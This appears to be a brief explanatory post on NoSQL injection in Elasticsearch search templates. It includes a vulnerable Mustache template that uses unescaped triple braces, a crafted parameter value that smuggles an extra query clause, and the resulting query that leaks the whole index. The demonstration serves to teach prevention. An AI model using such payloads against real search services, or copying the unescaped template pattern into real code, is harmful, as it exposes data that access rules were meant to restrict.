Preventing NoSQL injections with Elasticsearch

You can find all previously detected security flaws in ES, but NoSQL injection has never been one of them... so far.

However, you can find some literature that talks about how to do just that. Also some other discussions and resources might be worth reading.

As a quick example, it is definitely possible to create a NoSQL injection attack when using search templates that are leveraging the Mustache templating language. For instance, say we have the following two documents:

PUT attack/doc/1{  "field1": 2,  "field2": 1}PUT attack/doc/2{  "field1": 2,  "field2": 2}

And a template query on field1 that (wrongly) uses triple mustaches:

POST _scripts/attack{  "script": {    "lang": "mustache",    "source": """{  "query": {    "bool": {      "filter": [        {          "term": {            "field1": {{{field}}}          }        },        {          "range": {            "field2": {              "gte": 2            }          }        }      ]    }  }}    """  }}

By using a cleverly chosen value for the field parameter, we can leak the whole index:

POST attack/_search/template{  "id": "attack",  "params": {    "field": "2}}],\"should\":[{\"range\":{\"field2\":{\"lte\":2}"  }}

The final query would look like this, i.e. we were able to insert a should clause that basically leaks the whole index:

  {    "query" : {      "bool" : {        "filter" : [          {            "term" : {              "field1" : 2            }          }        ],        "should" : [          {            "range" : {              "field2" : {                "lte" : 2              }            }          },          {            "range" : {              "field2" : {                "gte" : 2              }            }          }        ]      }    }  }